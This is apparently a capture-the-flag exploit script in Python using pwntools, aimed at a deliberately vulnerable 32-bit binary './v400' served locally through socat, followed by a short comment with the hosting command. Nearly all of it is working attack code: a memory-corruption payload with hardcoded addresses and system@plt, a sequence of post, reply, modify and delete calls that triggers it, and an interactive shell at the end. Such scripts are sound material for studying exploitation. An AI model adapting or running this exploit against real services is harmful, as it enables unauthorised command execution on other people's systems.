from pwn import *
from pwnlib.tubes.remote import remote
from struct import pack, unpack
from time import sleep
from pdb import set_trace
# Tube to the target service; every helper below talks through this one
# connection.  Port 6666 must match the socat listener the author describes
# in the comment at the bottom of the page.  timeout is the per-read timeout
# (seconds) pwntools applies to this tube.
t = remote('localhost', 6666, timeout=1000)
# Main-menu choices of the target program, each sent as a single-digit line.
WRITE_COMMAND = '1'
READ_COMMAND = '2'
EXIT_COMMAND = '3'
# Per-post sub-menu choices, reached after READ_COMMAND + a post number
# (see reply/delete/modify below).  They reuse the same digits as the main
# menu, so the two groups must not be mixed up.
DELETE_COMMAND = '1'
MODIFY_COMMAND = '2'
REPLY_COMMAND = '3'
BACK_COMMAND = '4'
# Address of system@plt in the target binary, as supplied by the author.
# The 0x0804xxxx range suggests a non-PIE 32-bit build — confirm against the
# actual ./v400 binary before reuse.
system_plt = 0x8048630
def write(content=' '):
    """Post a new entry and return its 1-based sequence number as a string.

    Walks the target's "write" flow: menu choice, author line, title line,
    body line.  Author and title are derived from a running counter kept on
    the function object (``write.count``) so every post gets a distinct,
    predictable name.  ``content`` is sent verbatim as the body; it is the
    only field the exploit in main() controls.
    """
    write.count += 1
    seq = write.count
    lines = (
        WRITE_COMMAND,
        "author_%04i" % seq,
        "title_%04i" % seq,
        content,
    )
    for line in lines:
        t.sendline(line)
    return str(seq)
# Running count of posts created so far; starts at 0 so the first post is 0001.
write.count = 0
def reply(number, range_n=1):
    """Open post ``number`` and append ``range_n`` replies of '//bin/sh' to it.

    Flow: read menu -> post number -> reply sub-command -> one reply line per
    iteration -> back to the main menu.  '//bin/sh' is exactly 8 bytes (two
    32-bit words) and execs the same program as '/bin/sh'; presumably it is
    chosen for that size, but the reason is not visible from this script.
    """
    t.sendline(READ_COMMAND)
    t.sendline(number)
    t.sendline(REPLY_COMMAND)
    replies = ['//bin/sh'] * range_n
    for shell in replies:
        t.sendline(shell)
    t.sendline(BACK_COMMAND)
def delete(number):
    """Delete post ``number`` (read -> number -> delete) and return to the main menu."""
    steps = (READ_COMMAND, number, DELETE_COMMAND, BACK_COMMAND)
    for line in steps:
        t.sendline(line)
def modify(number):
    """Overwrite the author and title of post ``number``, then go back.

    The replacement strings are exploit input, not cosmetic: "author_" is a
    bare prefix and "title_%" ends in a '%'.  Why the target needs exactly
    these values is not visible from this script — keep them byte-for-byte.
    """
    steps = [
        READ_COMMAND,
        number,
        MODIFY_COMMAND,
        "author_",
        "title_%",
        BACK_COMMAND,
    ]
    for line in steps:
        t.sendline(line)
def main():
    """Drive the exploit end-to-end over the tube ``t`` and hand over a shell.

    The payload is a 32-bit little-endian layout (hence ``'<I'``): filler,
    0x80487c4, more filler, 0x80487c4 again, filler, system@plt, then a long
    tail.  The offsets (36/660/28/3000) and the 0x80487c4 value come from
    the author's analysis of the target and cannot be derived from this
    script — treat them as target-specific constants.

    Sequence: post a filler entry, post the payload, post another filler,
    reply to the payload post 255 times and delete it; then repeat the
    post/reply/modify dance on a fresh entry and delete that too.  The final
    delete is presumably what reaches system("//bin/sh"); the tube then goes
    interactive so the shell can be used.

    NOTE(review): str + struct.pack concatenation only works under Python 2;
    on Python 3 this raises TypeError (str vs bytes).
    """
    target_addr = 0x80487c4
    payload = ''.join([
        'a' * 36,
        pack('<I', target_addr),
        'a' * 660,
        pack('<I', target_addr),
        'a' * 28,
        pack('<I', system_plt),
        'a' * 3000,
    ])
    write()                   # filler post
    victim = write(payload)   # post whose body carries the layout above
    write()                   # filler post
    reply(victim, 255)
    delete(victim)
    second = write()
    write()
    reply(second, 255)
    modify(second)
    delete(second)
    t.interactive()
if __name__ == '__main__':
    # Uncomment to drop into pdb (set_trace is imported above) before any
    # traffic is sent to the target.
    # set_trace()
    main()
otms61 commented Dec 23, 2014

$ socat tcp-l:6666,reuseaddr,fork exec:./v400
The server is provided with socat: `tcp-l:6666,reuseaddr,fork` forks a fresh `./v400` process per connection (so every run of the script gets a clean process), and the port matches `remote('localhost', 6666)` in the script. Without a `bind=` option socat listens on all interfaces, so run this only on an isolated machine or VM — the binary is deliberately exploitable.
